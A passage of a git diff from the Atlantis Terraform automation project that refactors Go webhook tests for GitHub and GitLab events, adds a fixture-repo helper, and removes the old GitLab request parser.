+ Head: &github.PullRequestBranch{
+ Repo: &github.Repository{
+ FullName: github.String("runatlantis/atlantis-tests"),
+ CloneURL: github.String("/runatlantis/atlantis-tests.git"),
+ },
+ SHA: github.String(headSHA),
+ Ref: github.String("branch"),
+ },
+ Base: &github.PullRequestBranch{
+ Repo: &github.Repository{
+ FullName: github.String("runatlantis/atlantis-tests"),
+ CloneURL: github.String("/runatlantis/atlantis-tests.git"),
+ },
+ },
+ User: &github.User{
+ Login: github.String("atlantisbot"),
+ },
+ }
+}
+
+// absRepoPath returns the absolute path to the test repo under dir repoDir.
+func absRepoPath(t *testing.T, repoDir string) string {
+ path, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir))
+ Ok(t, err)
+ return path
+}
+
+// initializeRepo copies the repo data from testfixtures and initializes a new
+// git repo in a temp directory. It returns that directory and a function
+// to run in a defer that will delete the dir.
+// The purpose of this function is to create a real git repository with a branch
+// called 'branch' from the files under repoDir. This is so we can check in
+// those files normally without needing a .git directory.
+func initializeRepo(t *testing.T, repoDir string) (string, string, func()) {
+ originRepo := absRepoPath(t, repoDir)
+
+ // Copy the files to the temp dir.
+ destDir, cleanup := TempDir(t)
+ runCmd(t, "", "cp", "-r", fmt.Sprintf("%s/.", originRepo), destDir)
+
+ // Initialize the git repo.
+ runCmd(t, destDir, "git", "init")
+ runCmd(t, destDir, "touch", ".gitkeep")
+ runCmd(t, destDir, "git", "add", ".gitkeep")
+ runCmd(t, destDir, "git", "config", "--local", "user.email", "atlantisbot@runatlantis.io")
+ runCmd(t, destDir, "git", "config", "--local", "user.name", "atlantisbot")
+ runCmd(t, destDir, "git", "commit", "-m", "initial commit")
+ runCmd(t, destDir, "git", "checkout", "-b", "branch")
+ runCmd(t, destDir, "git", "add", ".")
+ runCmd(t, destDir, "git", "commit", "-am", "branch commit")
+ headSHA := runCmd(t, destDir, "git", "rev-parse", "HEAD")
+ headSHA = strings.Trim(headSHA, "\n")
+
+ return destDir, headSHA, cleanup
+}
+
+func runCmd(t *testing.T, dir string, name string, args ...string) string {
+ cpCmd := exec.Command(name, args...)
+ cpCmd.Dir = dir
+ cpOut, err := cpCmd.CombinedOutput()
+ Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut)
+ return string(cpOut)
+}
+
+func assertCommentEquals(t *testing.T, expFile string, act string, repoDir string) {
+ t.Helper()
+ exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile))
+ Ok(t, err)
+
+ // Replace all 'Creation complete after 1s ID: 1111818181' strings with
+ // 'Creation complete after *s ID: **********' so we can do a comparison.
+ idRegex := regexp.MustCompile(`Creation complete after [0-9]+s \(ID: [0-9]+\)`)
+ act = idRegex.ReplaceAllString(act, "Creation complete after *s (ID: ******************)")
+
+ if string(exp) != act {
+ // If in CI, we write the diff to the console. Otherwise we write the diff
+ // to file so we can use our local diff viewer.
+ if os.Getenv("CI") == "true" {
+ t.Logf("exp: %s, got: %s", string(exp), act)
+ t.FailNow()
+ } else {
+ actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act")
+ err := ioutil.WriteFile(actFile, []byte(act), 0600)
+ Ok(t, err)
+ cwd, err := os.Getwd()
+ Ok(t, err)
+ rel, err := filepath.Rel(cwd, actFile)
+ Ok(t, err)
+ t.Errorf("%q was different, wrote actual comment to %q", expFile, rel)
+ }
+ }
+}
diff --git a/server/events_controller_test.go b/server/events_controller_test.go
index 7997a56d8a..225021086f 100644
--- a/server/events_controller_test.go
+++ b/server/events_controller_test.go
@@ -16,6 +16,7 @@ package server_test
import (
"bytes"
"errors"
+ "fmt"
"io/ioutil"
"net/http"
"net/http/httptest"
@@ -90,7 +91,7 @@ func TestPost_InvalidGitlabSecret(t *testing.T) {
w := httptest.NewRecorder()
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(nil, errors.New("err"))
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(nil, errors.New("err"))
e.Post(w, req)
responseContains(t, w, http.StatusBadRequest, "err")
}
@@ -112,7 +113,7 @@ func TestPost_UnsupportedGitlabEvent(t *testing.T) {
w := httptest.NewRecorder()
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil)
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Ignoring unsupported event")
}
@@ -148,7 +149,7 @@ func TestPost_GitlabCommentInvalidCommand(t *testing.T) {
e, _, gl, _, _, _, _, cp := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{Ignore: true})
w := httptest.NewRecorder()
e.Post(w, req)
@@ -174,13 +175,13 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) {
RegisterMockTestingT(t)
vcsClient := vcsmocks.NewMockClientProxy()
e := server.EventsController{
- Logger: logging.NewNoopLogger(),
- CommentParser: &events.CommentParser{},
- GitlabRequestParser: &server.DefaultGitlabRequestParser{},
- Parser: &events.EventParser{},
- SupportedVCSHosts: []models.VCSHostType{models.Gitlab},
- RepoWhitelist: &events.RepoWhitelist{},
- VCSClient: vcsClient,
+ Logger: logging.NewNoopLogger(),
+ CommentParser: &events.CommentParser{},
+ GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
+ Parser: &events.EventParser{},
+ SupportedVCSHosts: []models.VCSHostType{models.Gitlab},
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{},
+ VCSClient: vcsClient,
}
requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json"))
Ok(t, err)
@@ -207,7 +208,7 @@ func TestPost_GithubCommentNotWhitelisted(t *testing.T) {
CommentParser: &events.CommentParser{},
Parser: &events.EventParser{},
SupportedVCSHosts: []models.VCSHostType{models.Github},
- RepoWhitelist: &events.RepoWhitelist{},
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{},
VCSClient: vcsClient,
}
requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent_notWhitelisted.json"))
@@ -231,7 +232,7 @@ func TestPost_GitlabCommentResponse(t *testing.T) {
e, _, gl, _, _, _, vcsClient, cp := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{CommentResponse: "a comment"})
w := httptest.NewRecorder()
e.Post(w, req)
@@ -262,14 +263,12 @@ func TestPost_GitlabCommentSuccess(t *testing.T) {
e, _, gl, _, cr, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Processing...")
- // wait for 200ms so goroutine is called
- time.Sleep(200 * time.Millisecond)
- cr.VerifyWasCalledOnce().ExecuteCommand(models.Repo{}, models.Repo{}, models.User{}, 0, nil)
+ cr.VerifyWasCalledOnce().RunCommentCommand(models.Repo{}, &models.Repo{}, models.User{}, 0, nil)
}
func TestPost_GithubCommentSuccess(t *testing.T) {
@@ -281,90 +280,105 @@ func TestPost_GithubCommentSuccess(t *testing.T) {
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
baseRepo := models.Repo{}
user := models.User{}
- cmd := events.Command{}
+ cmd := events.CommentCommand{}
When(p.ParseGithubIssueCommentEvent(matchers.AnyPtrToGithubIssueCommentEvent())).ThenReturn(baseRepo, user, 1, nil)
When(cp.Parse("", models.Github)).ThenReturn(events.CommentParseResult{Command: &cmd})
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Processing...")
- // wait for 200ms so goroutine is called
- time.Sleep(200 * time.Millisecond)
- cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd)
+ cr.VerifyWasCalledOnce().RunCommentCommand(baseRepo, nil, user, 1, &cmd)
}
-func TestPost_GithubPullRequestNotClosed(t *testing.T) {
- t.Log("when the event is a github pull reuqest but it's not a closed event we ignore it")
- e, v, _, _, _, _, _, _ := setup(t)
+func TestPost_GithubPullRequestInvalid(t *testing.T) {
+ t.Log("when the event is a github pull request with invalid data we return a 400")
+ e, v, _, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(githubHeader, "pull_request")
- event := `{"action": "opened"}`
+
+ event := `{"action": "closed"}`
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusOK, "Ignoring opened pull request event")
+ responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err")
}
-func TestPost_GitlabMergeRequestNotClosed(t *testing.T) {
- t.Log("when the event is a gitlab merge request but it's not a closed event we ignore it")
+func TestPost_GitlabMergeRequestInvalid(t *testing.T) {
+ t.Log("when the event is a gitlab merge request with invalid data we return a 400")
e, _, gl, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- event := gitlab.MergeEvent{}
- When(gl.Validate(req, secret)).ThenReturn(event, nil)
- When(p.ParseGitlabMergeEvent(event)).ThenReturn(models.PullRequest{State: models.Open}, models.Repo{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusOK, "Ignoring opened pull request event")
+ responseContains(t, w, http.StatusBadRequest, "Error parsing webhook: err")
}
-func TestPost_GithubPullRequestInvalid(t *testing.T) {
- t.Log("when the event is a github pull request with invalid data we return a 400")
- e, v, _, p, _, _, _, _ := setup(t)
+func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) {
+ t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400")
+ e, v, _, _, _, _, _, _ := setup(t)
+ e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(githubHeader, "pull_request")
event := `{"action": "closed"}`
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err")
+ responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
}
-func TestPost_GithubPullRequestInvalidRepo(t *testing.T) {
- t.Log("when the event is a github pull request with invalid repo data we return a 400")
- e, v, _, p, _, _, _, _ := setup(t)
+func TestPost_GitlabMergeRequestNotWhitelisted(t *testing.T) {
+ t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400")
+ e, _, gl, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
- req.Header.Set(githubHeader, "pull_request")
+ req.Header.Set(gitlabHeader, "value")
+
+ e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
- event := `{"action": "closed"}`
- When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusBadRequest, "Error parsing repo data: err")
+ responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
}
-func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) {
- t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400")
- e, v, _, p, _, _, _, _ := setup(t)
- e.RepoWhitelist = &events.RepoWhitelist{Whitelist: "github.com/nevermatch"}
+func TestPost_GithubPullRequestUnsupportedAction(t *testing.T) {
+ e, v, _, _, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(githubHeader, "pull_request")
- event := `{"action": "closed"}`
+ event := `{"action": "unsupported"}`
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, nil)
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
+ responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event")
}
-func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
- t.Log("when the event is a pull request and we have an error calling CleanUpPull we return a 503")
+func TestPost_GitlabMergeRequestUnsupportedAction(t *testing.T) {
+ t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400")
+ e, _, gl, p, _, _, _, _ := setup(t)
+ req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+ req.Header.Set(gitlabHeader, "value")
+ gitlabMergeEvent.ObjectAttributes.Action = "unsupported"
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+
+ w := httptest.NewRecorder()
+ e.Post(w, req)
+ responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event")
+}
+
+func TestPost_GithubPullRequestClosedErrCleaningPull(t *testing.T) {
+ t.Log("when the event is a closed pull request and we have an error calling CleanUpPull we return a 503")
RegisterMockTestingT(t)
e, v, _, p, _, c, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
@@ -374,31 +388,30 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
repo := models.Repo{}
pull := models.PullRequest{State: models.Closed}
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil)
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
When(c.CleanUpPull(repo, pull)).ThenReturn(errors.New("cleanup err"))
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: cleanup err")
}
-func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) {
- t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 503")
+func TestPost_GitlabMergeRequestClosedErrCleaningPull(t *testing.T) {
+ t.Log("when the event is a closed gitlab merge request and an error occurs calling CleanUpPull we return a 500")
e, _, gl, p, _, c, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- event := gitlab.MergeEvent{}
- When(gl.Validate(req, secret)).ThenReturn(event, nil)
+ gitlabMergeEvent.ObjectAttributes.Action = "close"
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
repo := models.Repo{}
pullRequest := models.PullRequest{State: models.Closed}
- When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil)
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: err")
}
-func TestPost_GithubPullRequestSuccess(t *testing.T) {
+func TestPost_GithubClosedPullRequestSuccess(t *testing.T) {
t.Log("when the event is a pull request and everything works we return a 200")
e, v, _, p, _, c, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
@@ -408,8 +421,7 @@ func TestPost_GithubPullRequestSuccess(t *testing.T) {
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
repo := models.Repo{}
pull := models.PullRequest{State: models.Closed}
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil)
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
When(c.CleanUpPull(repo, pull)).ThenReturn(nil)
w := httptest.NewRecorder()
e.Post(w, req)
@@ -421,40 +433,153 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) {
e, _, gl, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- event := gitlab.MergeEvent{}
- When(gl.Validate(req, secret)).ThenReturn(event, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
repo := models.Repo{}
pullRequest := models.PullRequest{State: models.Closed}
- When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil)
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Pull request cleaned successfully")
}
-func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParser, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
+func TestPost_PullOpenedOrUpdated(t *testing.T) {
+ cases := []struct {
+ Description string
+ HostType models.VCSHostType
+ Action string
+ }{
+ {
+ "github opened",
+ models.Github,
+ "opened",
+ },
+ {
+ "gitlab opened",
+ models.Gitlab,
+ "open",
+ },
+ {
+ "github synchronized",
+ models.Github,
+ "synchronize",
+ },
+ {
+ "gitlab update",
+ models.Gitlab,
+ "update",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ e, v, gl, p, cr, _, _, _ := setup(t)
+ req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+ switch c.HostType {
+ case models.Gitlab:
+ req.Header.Set(gitlabHeader, "value")
+ gitlabMergeEvent.ObjectAttributes.Action = c.Action
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+ case models.Github:
+ req.Header.Set(githubHeader, "pull_request")
+ event := fmt.Sprintf(`{"action": "%s"}`, c.Action)
+ When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
+ repo := models.Repo{}
+ pull := models.PullRequest{State: models.Closed}
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
+ }
+ w := httptest.NewRecorder()
+ e.Post(w, req)
+ responseContains(t, w, http.StatusOK, "Processing...")
+ cr.VerifyWasCalledOnce().RunAutoplanCommand(models.Repo{}, models.Repo{}, models.PullRequest{State: models.Closed}, models.User{})
+ })
+ }
+}
+
+func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
RegisterMockTestingT(t)
v := mocks.NewMockGithubRequestValidator()
- gl := mocks.NewMockGitlabRequestParser()
+ gl := mocks.NewMockGitlabRequestParserValidator()
p := emocks.NewMockEventParsing()
cp := emocks.NewMockCommentParsing()
cr := emocks.NewMockCommandRunner()
c := emocks.NewMockPullCleaner()
vcsmock := vcsmocks.NewMockClientProxy()
e := server.EventsController{
- Logger: logging.NewNoopLogger(),
- GithubRequestValidator: v,
- Parser: p,
- CommentParser: cp,
- CommandRunner: cr,
- PullCleaner: c,
- GithubWebHookSecret: secret,
- SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab},
- GitlabWebHookSecret: secret,
- GitlabRequestParser: gl,
- RepoWhitelist: &events.RepoWhitelist{
+ TestingMode: true,
+ Logger: logging.NewNoopLogger(),
+ GithubRequestValidator: v,
+ Parser: p,
+ CommentParser: cp,
+ CommandRunner: cr,
+ PullCleaner: c,
+ GithubWebHookSecret: secret,
+ SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab},
+ GitlabWebHookSecret: secret,
+ GitlabRequestParserValidator: gl,
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{
Whitelist: "*",
},
VCSClient: vcsmock,
}
return e, v, gl, p, cr, c, vcsmock, cp
}
+
+var gitlabMergeEvent = gitlab.MergeEvent{
+ ObjectAttributes: struct {
+ ID int `json:"id"`
+ TargetBranch string `json:"target_branch"`
+ SourceBranch string `json:"source_branch"`
+ SourceProjectID int `json:"source_project_id"`
+ AuthorID int `json:"author_id"`
+ AssigneeID int `json:"assignee_id"`
+ Title string `json:"title"`
+ CreatedAt string `json:"created_at"`
+ UpdatedAt string `json:"updated_at"`
+ StCommits []*gitlab.Commit `json:"st_commits"`
+ StDiffs []*gitlab.Diff `json:"st_diffs"`
+ MilestoneID int `json:"milestone_id"`
+ State string `json:"state"`
+ MergeStatus string `json:"merge_status"`
+ TargetProjectID int `json:"target_project_id"`
+ IID int `json:"iid"`
+ Description string `json:"description"`
+ Position int `json:"position"`
+ LockedAt string `json:"locked_at"`
+ UpdatedByID int `json:"updated_by_id"`
+ MergeError string `json:"merge_error"`
+ MergeParams struct {
+ ForceRemoveSourceBranch string `json:"force_remove_source_branch"`
+ } `json:"merge_params"`
+ MergeWhenBuildSucceeds bool `json:"merge_when_build_succeeds"`
+ MergeUserID int `json:"merge_user_id"`
+ MergeCommitSha string `json:"merge_commit_sha"`
+ DeletedAt string `json:"deleted_at"`
+ ApprovalsBeforeMerge string `json:"approvals_before_merge"`
+ RebaseCommitSha string `json:"rebase_commit_sha"`
+ InProgressMergeCommitSha string `json:"in_progress_merge_commit_sha"`
+ LockVersion int `json:"lock_version"`
+ TimeEstimate int `json:"time_estimate"`
+ Source *gitlab.Repository `json:"source"`
+ Target *gitlab.Repository `json:"target"`
+ LastCommit struct {
+ ID string `json:"id"`
+ Message string `json:"message"`
+ Timestamp *time.Time `json:"timestamp"`
+ URL string `json:"url"`
+ Author *gitlab.Author `json:"author"`
+ } `json:"last_commit"`
+ WorkInProgress bool `json:"work_in_progress"`
+ URL string `json:"url"`
+ Action string `json:"action"`
+ Assignee struct {
+ Name string `json:"name"`
+ Username string `json:"username"`
+ AvatarURL string `json:"avatar_url"`
+ } `json:"assignee"`
+ }{
+ Action: "merge",
+ },
+}
diff --git a/server/gitlab_request_parser.go b/server/gitlab_request_parser.go
deleted file mode 100644
index 94ab4ddd5a..0000000000
--- a/server/gitlab_request_parser.go
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package server
-
-import (
- "encoding/json"
- "fmt"
- "io/ioutil"
- "net/http"
-
- "github.com/lkysow/go-gitlab"
-)
-
-const secretHeader = "X-Gitlab-Token" // #nosec
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser.go GitlabRequestParser
-
-// GitlabRequestParser parses and validates GitLab requests.
-type GitlabRequestParser interface {
- // Validate validates that the request has a token header matching secret.
- // If the secret does not match it returns an error.
- // If secret is empty it does not check the token header.
- // It then parses the request as a GitLab object depending on the header
- // provided by GitLab identifying the webhook type. If the webhook type
- // is not recognized it will return nil but will not return an error.
- // Usage:
- // event, err := GitlabRequestParser.Validate(r, secret)
- // if err != nil {
- // return
- // }
- // switch event := event.(type) {
- // case gitlab.MergeCommentEvent:
- // // handle
- // case gitlab.MergeEvent:
- // // handle
- // default:
- // // unsupported event
- // }
- Validate(r *http.Request, secret []byte) (interface{}, error)
-}
-
-// DefaultGitlabRequestParser parses and validates GitLab requests.
-type DefaultGitlabRequestParser struct{}
-
-// Validate returns the JSON payload of the request.
-// See GitlabRequestParser.Validate()
-func (d *DefaultGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) {
- const mergeEventHeader = "Merge Request Hook"
- const noteEventHeader = "Note Hook"
-
- // Validate secret if specified.
- headerSecret := r.Header.Get(secretHeader)
- secretStr := string(secret)
- if len(secret) != 0 && headerSecret != secretStr {
- return nil, fmt.Errorf("header %s=%s did not match expected secret", secretHeader, headerSecret)
- }
-
- // Parse request into a gitlab object based on the object type specified
- // in the gitlabHeader.
- bytes, err := ioutil.ReadAll(r.Body)
- if err != nil {
- return nil, err
- }
- switch r.Header.Get(gitlabHeader) {
- case mergeEventHeader:
- var m gitlab.MergeEvent
- if err := json.Unmarshal(bytes, &m); err != nil {
- return nil, err
- }
- return m, nil
- case noteEventHeader:
- var m gitlab.MergeCommentEvent
- if err := json.Unmarshal(bytes, &m); err != nil {
- return nil, err
- }
- return m, nil
- }
- return nil, nil
-}
diff --git a/server/gitlab_request_parser_test.go b/server/gitlab_request_parser_test.go
deleted file mode 100644
index 385d718795..0000000000
--- a/server/gitlab_request_parser_test.go
+++ /dev/null
@@ -1,386 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package server_test
-
-import (
- "bytes"
- "net/http"
- "testing"
-
- "github.com/lkysow/go-gitlab"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var parser = server.DefaultGitlabRequestParser{}
-
-func TestValidate_InvalidSecret(t *testing.T) {
- t.Log("If the secret header is set and doesn't match expected an error is returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Token", "does-not-match")
- _, err = parser.Validate(req, []byte("secret"))
- Assert(t, err != nil, "should be an error")
- Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error())
-}
-
-func TestValidate_ValidSecret(t *testing.T) {
- t.Log("If the secret header matches then the event is returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Token", "secret")
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- b, err := parser.Validate(req, []byte("secret"))
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
-}
-
-func TestValidate_NoSecret(t *testing.T) {
- t.Log("If there is no secret then we ignore the secret header and return the event")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
